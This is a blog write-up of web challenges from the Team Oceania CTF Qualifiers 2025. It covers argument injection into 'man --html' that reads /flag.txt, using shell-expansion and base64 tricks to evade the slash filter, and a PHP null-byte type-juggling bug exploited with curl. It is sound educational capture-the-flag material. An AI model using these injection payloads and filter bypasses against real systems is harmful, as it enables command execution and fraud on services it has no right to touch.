Featured image of post Team Oceania CTF Qualifiers 2025 Writeups

Team Oceania CTF Qualifiers 2025 Writeups

Walkthrough the web challenge category with me created by the legendary hashkitten

Background

On the 8th of February, I participated in the Team Oceania CTF Qualifiers for 8 hours. In order to qualify for the team:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
The qualification criteria is…

We’ll automatically qualify the two fastest full clears in each category (Rev, Web, Crypto, Pwn, Forensics). If you full clear more than one only your fastest qualifying category counts (so the first one you get 1st or 2nd place in)
We’ll also qualify the top 6 on the leaderboard who did not previously qualify.

Points will use dynamic scoring and only eligible players will affect the scoring (everyone else will be hidden).

The other criteria are…

Must be born on or after 1st January 1999.
Must be over 18 years of age on the date of the international competition (roughly November)
Must be a citizen/permanent resident of Australia, New Zealand, or a Pacific Island country.

Since I was born in 1999, I am elligible to qualify, so I attempted to try my best at the web category and get top 2. I was able to get first blood on the login challenge but unfortunately the challenge took me a long time to solve, so I was unable to solve the remaining two web challenges. They were REALLY good web challenges and wanted to give a massive shout out to hashkitten who authored these challenges. I think if the quality of the challenges were poor, I would have been salty about not making the team but since I knew they were really well-made, I have a lot of confidence in the selection process, and I am looking forward to Team Oceania bringing home the gold!

I have written writeups for the following web challenges:

manic (180)

Description

Hackers keep getting into my manpage service!

http://challenges.oceaniacc.com:5001

Attachments

src-manic.tar.gz

Writeup

What do we have here?

For this web challenge we are provided the source code via the attached compressed file src-manic.tar.gz. We decompress with the following command:

1
tar xvf src-manic.tar.gz

The source code consists of a python web application which essentially allows us to read the manual pages for specified commands.

For example, browsing to the link http://challenges.oceaniacc.com:5001/1/grep will give us section 1 of the grep command manual page.

grep command manpage

How this works is it’s essentially running the man command in the backend with the arguments inputted within the URL, and displaying the output on the webpage:

1
man 1 grep

This logic can be observed at app.py#L11-L23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
@app.route('/<path:command>')
def show_man_page(command):
    command_list = command.split('/')

    # Only alphanumeric please
    for i, cmd in enumerate(command_list):
        if not cmd.isalnum():
            del command_list[i]

    result = subprocess.run(['man', *command_list], capture_output=True, text=True)
    output = result.stderr if result.returncode != 0 else result.stdout

    return render_template('manpage.html', content=output)

Let’s break down the code so that we can understand the security controls in place and if there are any vulnerabilities that arise.

Source Code Breakdown

First, let’s look at how the user inputs are initially passed.

1
2
3
@app.route('/<path:command>')
def show_man_page(command):
    command_list = command.split('/')

A route is set up at the root of the webpage “/” and defines a dynamic URL parameter named command with the type path. Any input in the URL path after the root “/” will be saved in this command parameter.

This command parameter is passed to the show_man_page function and the value is split into a list, with the delimiter being “/”.

For example, when the URL is /1/grep, the value of command will be 1/grep and the value of command_list will become ["1","grep"].

Following this, we observe a security control that attempts input sanitisation:

1
2
3
4
    # Only alphanumeric please
    for i, cmd in enumerate(command_list):
        if not cmd.isalnum():
            del command_list[i]

This code iterates through the command_list list with i being the index of the iteration and cmd being the value at the index.

For each iteration, using the isalnum function, if the value contains any characters that are not letters or digits, the list is modified to remove the current index.

While this could be seen as appropriate input filtering to not allow special characters, a bypass can occur due to modifying the list while it is being iterated through.

Say our command_list variable contains the value ["1","i!!egal","also_illeg@l", "valid", "also_valid"]. You would expect index 1 and 2 of the array to be deleted to result in ["1", "valid", "also_valid"]. However, this is not the case.

Let’s see what happens in each iteration.

Iteration 0:

1
2
3
4
5
6
7
command_list=["1","i!!egal","also_illeg@l", "valid", "also_valid"]
i=0
cmd="1"

is cmd alphanumeric? YES

nothing happens

Iteration 1:

1
2
3
4
5
6
7
8
command_list=["1","i!!egal","also_illeg@l", "valid", "also_valid"]
i=1
cmd="i!!egal"

is cmd alphanumeric? NO

Delete command_list[1]:
command_list=["1","also_illeg@l", "valid", "also_valid"]

Iteration 2:

1
2
3
4
5
6
command_list=["1","also_illeg@l", "valid", "also_valid"]
command_list=["1","also_illeg@l"]
i=2
cmd="valid"

Wait what we skipped the "also_illeg@l" value?

After the rest of the iterations, as the following values are valid, nothing else gets deleted:

1
command_list=["1","also_illeg@l", "valid", "also_valid"]

This occurs because when we process index 1 and delete it, the value of index 1 becomes the value of index 2, and so on the next iteration at index 2, we have skipped the original value of index 2.

We have successfully found a bypass on the input sanitisation method, now allowing us to input arbitrary characters (besides “/” due to the split function removing all of those).

Moving on to the juicy part, command execution!

1
2
    result = subprocess.run(['man', *command_list], capture_output=True, text=True)
    output = result.stderr if result.returncode != 0 else result.stdout

We can see that the man command is executed with arguments provided by the user. If the inputs were only alphanumeric, then this code may not vulnerable, but as we found a way to bypass the input sanitisation, we can use hyphens to do argument injection.

Finding the Right Argument to Inject

One thing I tried to do is to see if we can do things such as glob expansions or command substitution, however, due to how the run function works, command substitutions or other shell shenanigans won’t be executed.

Let’s step back to see what our objectives are. To obtain the flag, we can:

  1. Attempt to read the flag file at /flag.txt with the man binary
  2. Execute other binaries to obtain the contents of /flag.txt

The location of the flag can be observed at Dockerfile#L11:

1
COPY flag.txt /

This part will require you to research each option until you are able to read the flag file. During my attempt of the challenge, I thought I could change the MANPATH and change the extensions of man pages that I read:

1
2
3
-M, --manpath=PATH         set search path for manual pages to PATH
...
-e, --extension=EXTENSION  limit search to extension type EXTENSION

Testing man --manpath=/ --extension=txt locally did not work unfortunately and resulted me in getting stuck on why that didn’t work. I never found out why due to the lack of documentation and was unable to solve the challenge during the CTF duration.

On review of the solution after the CTF finished, I felt very silly not checking this option out.

1
-H, --html[=BROWSER]       use www-browser or BROWSER to display HTML output

The fact that it says www-browser is a big hint because I have seen it link to the lynx browser in Debian. I can see this on my Debian install:

1
2
3
4
5
6
$ which www-browser
/usr/bin/www-browser
$ ls -l /usr/bin/www-browser
lrwxrwxrwx 1 root root 29 Oct 28 14:38 /usr/bin/www-browser -> /etc/alternatives/www-browser
$ ls -l /etc/alternatives/www-browser
lrwxrwxrwx 1 root root 13 Oct 28 14:38 /etc/alternatives/www-browser -> /usr/bin/lynx

So, theoretically, if I specify another binary that isn’t a browser, it should execute. I tried to do this locally and execute the ls command, but it didn’t work. I don’t know the reason why but might be because it’s a different implementation of man compared to the container’s man binary.

1
2
$ man --html=ls man
man: command exited with status 3: (cd /tmp/hmanyFvR7I && /usr/libexec/man-db/zsoelim) | (cd /tmp/hmanyFvR7I && /usr/libexec/man-db/manconv -f UTF-8:ISO-8859-1 -t UTF-8//IGNORE) | (cd /tmp/hmanyFvR7I && preconv -e UTF-8) | (cd /tmp/hmanyFvR7I && tbl) | (cd /tmp/hmanyFvR7I && groff -mandoc -Thtml)

EDIT: Someone mentioned it not working on local machine on discord after the CTF and hashkitten (the author) mentioned you need to install some packages.

Local Error Discussion

I ran it in a local docker container instead, using the provided Dockerfile to match the exact environment and I was able to execute the ls binary!

1
2
3
4
$ docker build -t manic .
$ docker run -it --entrypoint bash manic
nobody@21aa2caa1ab3:/app$ man --html=ls man
/tmp/hmandNHcO9/man.html

Utilising the Command Injection

Testing with a few other commands, I found that the command being executed will look like this:

1
<BROWSER> <TMP_DIR>/<COMMAND>.html

So man --html=ls man will execute ls /tmp/<RANDOM_STRING>/man.html.

You can also include arguments for your commands like man --html="ls -l" man

Now all we have to do is read the flag!

1
man --html="cat /flag.txt" man

Sure that works on the docker container, however, there’s a forward slash required in our payload! To bypass this, we identify that the command we specify in the HTML argument is safe from the subprocess.run function’s safe argument passing, allowing us to do shell expansions. Therefore, we can specify a slash with parameter expansion as we know the first character of the env variable PATH will be “/”:

1
${PATH:0:1}

Our final command executed in the container will look like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
nobody@21aa2caa1ab3:/app$ man --html="cat ${PATH:0:1}flag.txt" man
oiccflag{test}
<!-- Creator     : groff version 1.22.4 -->
<!-- CreationDate: Wed Feb 12 13:47:14 2025 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="generator" content="groff -Thtml, see www.gnu.org">
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
... SNIPPED ...

Ok now we got a PoC working in the container. Time to convert this in URL form:

1
http://challenges.oceaniacc.com:5001/$/--html="cat ${PATH:0:1}flag.txt"/man

When sending this we get the following error:

1
2
3
4
sh: 1: Syntax error: Missing '}'
sh: 1: 0: not found
sh: 1: 1}flag.txt: not found
man: couldn't execute any browser from cat ${PATH:0:1}flag.txt

Weird, is it not expanding properly? I try with just ${PATH}:

1
2
3
4
http://challenges.oceaniacc.com:5001/$/--html=cat%20$%7BPATH%7Dflag.txt/man

cat: '/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binflag.txt': No such file or directory
man: couldn't execute any browser from cat ${PATH}flag.txt

Ok it actually resolved the PATH variable. It is known that the colons to extract substrings in parameter expansions don’t work in sh, so maybe it’s executing in a primitive shell. Looking at the solution, it uses the % operator which is used for pattern removal in parameter expansion. I can use this operator instead to remove the rest of the string to only give me /. I can’t use PATH though because it contains multiple forward slash characters. Let’s see what the value of PWD is.

1
2
3
4
http://challenges.oceaniacc.com:5001/$/--html=cat%20$%7BPWD%7Dflag.txt/man

cat: /appflag.txt: No such file or directory
man: couldn't execute any browser from cat ${PWD}flag.txt

Note: PATH and PWD are well-known environment and shell variables. You can check out more common variables here but I prefer just executing the env command in the docker container to see what’s available.

I can determine that PWD is /app. So if I do ${PWD%app}, this will result in just /. The final payload is here:

1
http://challenges.oceaniacc.com:5001/$/--html=cat${PWD%app}flag.txt/man

URL Encoded:

1
http://challenges.oceaniacc.com:5001/$/--html=cat%20$%7BPWD%7Dflag.txt/man

Final Payload

At the very top is our lovely flag!

1
oiccflag{i_wish_i_did_this_more_securely_10a287eb}

Other Command Injection Payloads

I wanted to note a few other payloads that were posted in the discord which I thought were interesting.

Python

Python Payload

1
http://127.0.0.1:1337/-1/-Hpython%20-c%20'print(open(chr(47)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)).read())'%20%23/man

Decoded URL:

1
http://127.0.0.1:1337/-1/-Hpython -c 'print(open(chr(47)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)).read())' #/man

Output:

Python Payload Output

Python code:

1
print(open(chr(47)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)).read())

Equivalent Python code

1
print(open("/flag.txt").read())

The use of the chr function in Python is a common method to bypass character restrictions in Pyjails. In this case we are replacing the “/” character with chr(47).

Base64

Base64 Payload

1
2
3
{base_url}/;/--html="$(echo%20\'L2ZsYWcudHh0\'|base64%20-d)"/;/-l/;/app.py

http://challenges.oceaniacc.com:5001/;/--html=%22$(echo%20'L2ZsYWcudHh0'|base64%20-d)%22/;/-l/;/app.py

Decoded URL:

1
{base_url}/;/--html="$(echo 'L2ZsYWcudHh0'|base64 -d)"/;/-l/;/app.py

Output:

Base64 Payload Output

Base64 allows the forward slash character to be encoded:

1
L2ZsYWcudHh0 -> (base64 decode) -> /flag.txt

Not sure why the -l app.py is there tbh. Might have been artifacts from previous injections. It still works but doesn’t seem like it’s required. The following works:

1
http://challenges.oceaniacc.com:5001/;/--html=%22$(echo%20'L2ZsYWcudHh0'|base64%20-d)%22/man

Decoded URL:

1
http://challenges.oceaniacc.com:5001/;/--html="$(echo 'L2ZsYWcudHh0'|base64 -d)"/man

One thing I tried with this payload is without the pipe character. So something like this would work if the bash shell was used:

1
$(base64 -d <<< 'L2ZsYWcudHh0')

However, this redirection operator doesn’t work on sh which means it won’t on this challenge.

Additionally, I wanted to highlight the use of the command substitution to print the flag in the error message rather than printing to stdout is very creative. However, this only works because the executable bit is set for the flag.txt file.

1
2
3
4
5
6
7
$ ls -l /flag.txt
-rw-r--r-- 1 root root 12 Feb  8 18:14 /flag.txt
$ /flag.txt
sh: 11: /flag.txt: Permission denied
$ sudo chmod +x /flag.txt
$ /flag.txt
/flag.txt: 1: oicc{hello}: not found

If stderr is not outputted or the executable bit is not set, I would make the payload like this:

1
http://challenges.oceaniacc.com:5001/;/--html=cat%20$(echo%20'L2ZsYWcudHh0'|base64%20-d)/man

URL decoded:

1
http://challenges.oceaniacc.com:5001/;/--html=cat $(echo 'L2ZsYWcudHh0'|base64 -d)/man

Note a very interesting behaviour between the two payloads:

1
http://challenges.oceaniacc.com:5001/;/--html=%22cat%20$(echo%20'L2ZsYWcudHh0'|base64%20-d)%22/man

Base64 Payload Stdout 1

1
http://challenges.oceaniacc.com:5001/;/--html=cat%20$(echo%20'L2ZsYWcudHh0'|base64%20-d)/man

Base64 Payload Stdout 2

The difference is that the value for the --html argument is wrapped with double quotes. When wrapped with double quotes, the payload does not work. This is because when wrapping the initial command in a shell with double quotes, it will include the spaces as a part of the binary that it’s searching for to execute.

1
2
3
4
5
$ "ls -l"
sh: 15: ls -l: not found
$ ls -l
total 12
-rw-r--r-- 1 solopie solopie   89 Jan 14 22:51 README.m
Bruh

I found this one funny for some reason. The one thing I love about CTFs is that sometimes you’ll find a solution that seems very obvious but completely crosses your mind. No need for fancy expansions!

Bruh Payload 2

Bruh Payload

1
http://challenges.oceaniacc.com:5001/-/-Hcd%20..%26%26cat%20flag.txt/-/man

Decoded URL:

1
http://challenges.oceaniacc.com:5001/-/-Hcd ..&&cat flag.txt/-/man

Traverse to parent directory and read the flag… As simple as it can get (as far as I know)!

Bruh Payload Output

Sorry if I missed out on any other payloads. Feel free to let me know of any other ideas in the comments and I’ll add them in if they work!

Post challenge thoughts

The reason why I couldn’t solve this challenge was due to my methodology when enumerating what arguments I could abuse. I lacked the experience to identify certain characteristics of arguments that would achieve the objective of reading the flag. In order to improve in this aspect, I have developed a blog to explore enumerating a binary’s options and identifying potential risks to arguments in binaries here (WIP).

beans (230)

Description

Some people made their money in tech, I made it in beans

http://challenges.oceaniacc.com:5002

Attachments

src-beans.tar.gz

Writeup

DISCLAIMER: I wasn’t able to look at this challenge during the CTF duration, however, I decided to give it a crack without look at the solution first so I could document my thought process.

Background

Bean Trader Site

We are presented with a simple commerce site that allows us to buy and sell beans. We start with 100 bucks and 0 beans and with each bean having the value of 25 dollars. When attempting to press the Get Flag button, we are presented with the message You need 1337 money for the flag. Logically, we can’t profit since selling is the same price as buying. Therefore, we need to find a bypass for the amt variable that would let us sell more than we have to obtain more money.

Let’s take a deep dive into the code!

PHP Type Juggling Behaviour Shenanigans

We first decompress the source code archive:

1
tar xvf src-beans.tar.gz

I want to specifically look at the sell function because the buy function isn’t going to get me more money.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
function validate_integer($s) {
    return ctype_digit(trim($s));
}

... SNIPPED ...

        case 'sell':
            $amt = $_REQUEST['amt'];
            if (!validate_integer($amt)) {
                $error_msg = "That amount isn't valid!";
                break;
            }
            if ($amt < 0) {
                $error_msg = "You can't sell negative beans!";
                break;
            }
            if ($_SESSION['beans'] < $amt) {
                $error_msg = "You don't have that many beans to sell!";
                break;
            }
            $_SESSION['beans'] -= $amt;
            $_SESSION['money'] += $amt * BEAN_COST;
            $success_msg = "Sold $amt beans.";
            break;

We observe the user-defined function validate_integer which is used to check if the amt variable is an integer. If the function indicates that it is not an integer, then an error is thrown. Looking at how the validation function works, there is an interesting quirk to it. It uses the trim function to get rid of whitespaces before checking if the input is a number. Technically, this means that any number with whitespaces is still considered valid.

As an example, I show that numbers that contain spaces before and after are considered valid:

1
2
3
4
5
6
php > echo var_dump(validate_integer("100"));
bool(true)
php > echo var_dump(validate_integer("100 "));
bool(true)
php > echo var_dump(validate_integer("   100     "));
bool(true)

How could we potentially use this behaviour?

Later in the sell functionality, we observe the conditional expression that checks if we have enough beans to sell. Remember our objective is to sell more beans than we actually have.

1
            if ($_SESSION['beans'] < $amt) {

In PHP, there is a feature called type juggling that allows comparisons between different types by attempting to convert them into one or the other.

Let’s explore the behaviour for the less than sign (<):

1
2
3
4
php > echo var_dump(1<"1a");
bool(true)
php > echo var_dump(2<"1a");
bool(false)

When comparing an integer with a string with the less than sign, what happens here is that the integer is converted to a string, and it is compared in alphabetical order. This is interesting to us because if you only observe the integers for the 1st comparison 1<"1a", by including a non-digit in our string, in the context of the application there will be a logical error as the expected result for 1<1 is false. This occurs as both values are compared by alphabetical order.

Consider this comparison:

1
2
php > echo var_dump(2<"100a");
bool(false)

In the context of the program, it would assume the comparison would be 2<100 which is true in terms of integers. However, if we include a character in the string, it becomes false due to comparing alphabetically when considering both sides as strings! This essentially defines the purpose for the validate_integer function in an attempt to ensure that string comparisons do not occur.

We have now identified a potential bypass for the beans check if we include non-digit characters within the amt input. While we can’t include letters like I have done in the examples, we can include whitespace which may potentially still cause the same behaviour of alphabetical comparisons instead.

The Infamous Byte

First we need to look at what characters the trim function will strip to see what are our options. By default the function will strip these characters:

1
2
3
4
5
6
" ": ASCII SP character 0x20, an ordinary space.
"\t": ASCII HT character 0x09, a tab.
"\n": ASCII LF character 0x0A, a new line (line feed).
"\r": ASCII CR character 0x0D, a carriage return.
"\0": ASCII NUL character 0x00, the NUL-byte.
"\v": ASCII VT character 0x0B, a vertical tab.

Next, we want to attempt to replicate the behaviour for 2<100a returning false.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
php > echo var_dump(2<"100 ");
bool(true)
php > echo var_dump(2<"100\t");
bool(true)
php > echo var_dump(2<"100\n");
bool(true)
php > echo var_dump(2<"100\r");
bool(true)
php > echo var_dump(2<"100\0");
bool(false)
php > echo var_dump(2<"100\v");
bool(true)

We observe the null byte has the same behaviour! Therefore, we can bypass the validate_integer function and cause the alphabetical comparison to buy more beans than we actually have.

Solving the Challenge

I will be running the following commands on a local docker instance. To set this up:

1
2
docker build -t beans .
docker run -p 1337:1337 beans

First, grab a valid PHP session that tracks our beans and money:

1
SESH_COOKIE=$(curl -s -i "http://localhost:1337" | sed -n 's/.*\(PHPSESSID=[^;]*\).*/\1/p')

Buy two beans:

1
curl -s -b "$SESH_COOKIE" "http://localhost:1337/?action=buy&amt=2"
1
2
3
4
5
6
7
        <div class="hand-drawn mb-8">
            <div class="text-xl mb-4">Your Stash:</div>
            <div class="grid grid-cols-2 gap-4">
                <div>Money: $50</div>
                <div>Beans: 2</div>
            </div>
        </div>

Sell 100 beans with a null byte in our amount. To include a null byte in the amt input, we can use url-encoding. If you want to see the HTML output, you will have to use --output - to indicate that you want to send to stdout:

1
curl -s --output - -b "$SESH_COOKIE" "http://localhost:1337/?action=sell&amt=100%00"
1
2
3
4
5
6
7
        <div class="hand-drawn mb-8">
            <div class="text-xl mb-4">Your Stash:</div>
            <div class="grid grid-cols-2 gap-4">
                <div>Money: $2550</div>
                <div>Beans: -98</div>
            </div>
        </div>

Now we can buy the flag:

1
curl -s -b "$SESH_COOKIE" "http://localhost:1337/?action=flag" | sed -n 's/.*\(oicc.*\)/\1/p'
1
oiccflag{test}

To replicate this on the challenge infrastructure:

1
2
3
SESH_COOKIE=$(curl -s -i "http://challenges.oceaniacc.com:5002" | sed -n 's/.*\(PHPSESSID=[^;]*\).*/\1/p')
curl -s -b "$SESH_COOKIE" "http://challenges.oceaniacc.com:5002/?action=buy&amt=2"
curl -s --output - -b "$SESH_COOKIE" "http://challenges.oceaniacc.com:5002/?action=sell&amt=100%00"

Unfortunately, the challenge infrastructure got taken down before I was able to solve this challenge so I don’t have the actual flag 😢

Post Challenge Thoughts

PHP quirks are interesting. I had to ask hashkitten about the string comparison logic because I had no idea why it was doing that originally. I assumed it was just magically removing the 0s in the string for whatever reason.

Hashkitten Reply

In hindsight, it does seem pretty obvious now. It would be good to explore PHP type juggling and identify what types get casted to what when type juggling occurs and also for different operators. I’m also interested to know if any other languages are affected by this and what are the differences in how it handles comparing different types. I know JavaScript is another language that has loose types so may have a blog about it in the future.

login (235)

Description

Attachments

Writeup